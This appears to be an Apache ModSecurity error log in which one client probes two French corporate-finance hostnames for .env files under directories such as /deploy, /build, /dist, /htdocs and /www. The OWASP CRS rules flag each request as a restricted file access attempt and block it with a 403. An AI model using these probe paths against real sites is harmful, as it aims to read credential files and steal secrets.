[Mon May 11 16:25:45.303335 2026] [security2:error] [pid 1411055:tid 1411058] [client 18.180.54.2:41582] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /deploy/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/deploy/.env"] [unique_id "agHm6UWKUxpmnkK7zHx7rQAAAQE"]
[Mon May 11 16:25:45.303581 2026] [security2:error] [pid 1411055:tid 1411058] [client 18.180.54.2:41582] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/deploy/.env"] [unique_id "agHm6UWKUxpmnkK7zHx7rQAAAQE"]
[Mon May 11 16:25:45.304061 2026] [core:error] [pid 1411055:tid 1411058] [client 18.180.54.2:41582] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:45.304231 2026] [security2:error] [pid 1411055:tid 1411058] [client 18.180.54.2:41582] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/deploy/.env"] [unique_id "agHm6UWKUxpmnkK7zHx7rQAAAQE"]
[Mon May 11 16:25:45.770086 2026] [security2:error] [pid 1411201:tid 1411260] [client 18.180.54.2:41596] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/shared/.env"] [unique_id "agHm6fy_GXSWIKeli0vyCAAAAI4"]
[Mon May 11 16:25:45.770324 2026] [security2:error] [pid 1411201:tid 1411260] [client 18.180.54.2:41596] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/shared/.env"] [unique_id "agHm6fy_GXSWIKeli0vyCAAAAI4"]
[Mon May 11 16:25:45.770799 2026] [core:error] [pid 1411201:tid 1411260] [client 18.180.54.2:41596] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:45.770946 2026] [security2:error] [pid 1411201:tid 1411260] [client 18.180.54.2:41596] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/shared/.env"] [unique_id "agHm6fy_GXSWIKeli0vyCAAAAI4"]
[Mon May 11 16:25:46.002095 2026] [security2:error] [pid 1411055:tid 1411057] [client 18.180.54.2:41604] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /build/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/build/.env"] [unique_id "agHm6kWKUxpmnkK7zHx7rgAAAQA"]
[Mon May 11 16:25:46.002335 2026] [security2:error] [pid 1411055:tid 1411057] [client 18.180.54.2:41604] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/build/.env"] [unique_id "agHm6kWKUxpmnkK7zHx7rgAAAQA"]
[Mon May 11 16:25:46.002812 2026] [core:error] [pid 1411055:tid 1411057] [client 18.180.54.2:41604] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:46.002965 2026] [security2:error] [pid 1411055:tid 1411057] [client 18.180.54.2:41604] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/build/.env"] [unique_id "agHm6kWKUxpmnkK7zHx7rgAAAQA"]
[Mon May 11 16:25:46.475550 2026] [security2:error] [pid 1411201:tid 1411264] [client 18.180.54.2:41620] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /deploy/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/deploy/.env"] [unique_id "agHm6vy_GXSWIKeli0vyCQAAAJI"]
[Mon May 11 16:25:46.475778 2026] [security2:error] [pid 1411201:tid 1411264] [client 18.180.54.2:41620] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/deploy/.env"] [unique_id "agHm6vy_GXSWIKeli0vyCQAAAJI"]
[Mon May 11 16:25:46.476272 2026] [core:error] [pid 1411201:tid 1411264] [client 18.180.54.2:41620] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:46.476434 2026] [security2:error] [pid 1411201:tid 1411264] [client 18.180.54.2:41620] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/deploy/.env"] [unique_id "agHm6vy_GXSWIKeli0vyCQAAAJI"]
[Mon May 11 16:25:46.726031 2026] [security2:error] [pid 1411055:tid 1411079] [client 18.180.54.2:41622] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dist/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/dist/.env"] [unique_id "agHm6kWKUxpmnkK7zHx7rwAAARY"]
[Mon May 11 16:25:46.726386 2026] [security2:error] [pid 1411055:tid 1411079] [client 18.180.54.2:41622] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/dist/.env"] [unique_id "agHm6kWKUxpmnkK7zHx7rwAAARY"]
[Mon May 11 16:25:46.727222 2026] [core:error] [pid 1411055:tid 1411079] [client 18.180.54.2:41622] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:46.727439 2026] [security2:error] [pid 1411055:tid 1411079] [client 18.180.54.2:41622] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/dist/.env"] [unique_id "agHm6kWKUxpmnkK7zHx7rwAAARY"]
[Mon May 11 16:25:47.194865 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.180.54.2:41638] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /build/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/build/.env"] [unique_id "agHm6w-Qm4vhlWBPlMi5yAAAAAE"]
[Mon May 11 16:25:47.195107 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.180.54.2:41638] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/build/.env"] [unique_id "agHm6w-Qm4vhlWBPlMi5yAAAAAE"]
[Mon May 11 16:25:47.195602 2026] [core:error] [pid 1411099:tid 1411102] [client 18.180.54.2:41638] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:47.195761 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.180.54.2:41638] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/build/.env"] [unique_id "agHm6w-Qm4vhlWBPlMi5yAAAAAE"]
[Mon May 11 16:25:47.429851 2026] [security2:error] [pid 1411201:tid 1411262] [client 18.180.54.2:41640] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public_html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/public_html/.env"] [unique_id "agHm6_y_GXSWIKeli0vyCgAAAJA"]
[Mon May 11 16:25:47.430100 2026] [security2:error] [pid 1411201:tid 1411262] [client 18.180.54.2:41640] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/public_html/.env"] [unique_id "agHm6_y_GXSWIKeli0vyCgAAAJA"]
[Mon May 11 16:25:47.430585 2026] [core:error] [pid 1411201:tid 1411262] [client 18.180.54.2:41640] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:47.430747 2026] [security2:error] [pid 1411201:tid 1411262] [client 18.180.54.2:41640] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/public_html/.env"] [unique_id "agHm6_y_GXSWIKeli0vyCgAAAJA"]
[Mon May 11 16:25:47.934805 2026] [security2:error] [pid 1416109:tid 1416148] [client 18.180.54.2:41646] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dist/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/dist/.env"] [unique_id "agHm61V4kyjgo4bQBUhUAgAAANI"]
[Mon May 11 16:25:47.935049 2026] [security2:error] [pid 1416109:tid 1416148] [client 18.180.54.2:41646] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/dist/.env"] [unique_id "agHm61V4kyjgo4bQBUhUAgAAANI"]
[Mon May 11 16:25:47.935606 2026] [core:error] [pid 1416109:tid 1416148] [client 18.180.54.2:41646] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:47.935821 2026] [security2:error] [pid 1416109:tid 1416148] [client 18.180.54.2:41646] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/dist/.env"] [unique_id "agHm61V4kyjgo4bQBUhUAgAAANI"]
[Mon May 11 16:25:48.106528 2026] [security2:error] [pid 1411055:tid 1411065] [client 18.180.54.2:41660] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /htdocs/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/htdocs/.env"] [unique_id "agHm7EWKUxpmnkK7zHx7sAAAAQg"]
[Mon May 11 16:25:48.106752 2026] [security2:error] [pid 1411055:tid 1411065] [client 18.180.54.2:41660] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/htdocs/.env"] [unique_id "agHm7EWKUxpmnkK7zHx7sAAAAQg"]
[Mon May 11 16:25:48.107279 2026] [core:error] [pid 1411055:tid 1411065] [client 18.180.54.2:41660] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:48.107437 2026] [security2:error] [pid 1411055:tid 1411065] [client 18.180.54.2:41660] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/htdocs/.env"] [unique_id "agHm7EWKUxpmnkK7zHx7sAAAAQg"]
[Mon May 11 16:25:48.671112 2026] [security2:error] [pid 1412074:tid 1412094] [client 18.180.54.2:53692] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public_html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/public_html/.env"] [unique_id "agHm7DJnyuKVXoStDha0YQAAAFI"]
[Mon May 11 16:25:48.671362 2026] [security2:error] [pid 1412074:tid 1412094] [client 18.180.54.2:53692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/public_html/.env"] [unique_id "agHm7DJnyuKVXoStDha0YQAAAFI"]
[Mon May 11 16:25:48.671852 2026] [core:error] [pid 1412074:tid 1412094] [client 18.180.54.2:53692] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:48.672003 2026] [security2:error] [pid 1412074:tid 1412094] [client 18.180.54.2:53692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/public_html/.env"] [unique_id "agHm7DJnyuKVXoStDha0YQAAAFI"]
[Mon May 11 16:25:48.821688 2026] [security2:error] [pid 1411055:tid 1411069] [client 18.180.54.2:53704] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/www/.env"] [unique_id "agHm7EWKUxpmnkK7zHx7sQAAAQw"]
[Mon May 11 16:25:48.821900 2026] [security2:error] [pid 1411055:tid 1411069] [client 18.180.54.2:53704] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/www/.env"] [unique_id "agHm7EWKUxpmnkK7zHx7sQAAAQw"]
[Mon May 11 16:25:48.822384 2026] [core:error] [pid 1411055:tid 1411069] [client 18.180.54.2:53704] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:48.822538 2026] [security2:error] [pid 1411055:tid 1411069] [client 18.180.54.2:53704] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/www/.env"] [unique_id "agHm7EWKUxpmnkK7zHx7sQAAAQw"]
[Mon May 11 16:25:49.409598 2026] [security2:error] [pid 1411099:tid 1411107] [client 18.180.54.2:53716] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /htdocs/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/htdocs/.env"] [unique_id "agHm7Q-Qm4vhlWBPlMi5zQAAAAY"]
[Mon May 11 16:25:49.409825 2026] [security2:error] [pid 1411099:tid 1411107] [client 18.180.54.2:53716] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/htdocs/.env"] [unique_id "agHm7Q-Qm4vhlWBPlMi5zQAAAAY"]
[Mon May 11 16:25:49.410343 2026] [core:error] [pid 1411099:tid 1411107] [client 18.180.54.2:53716] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
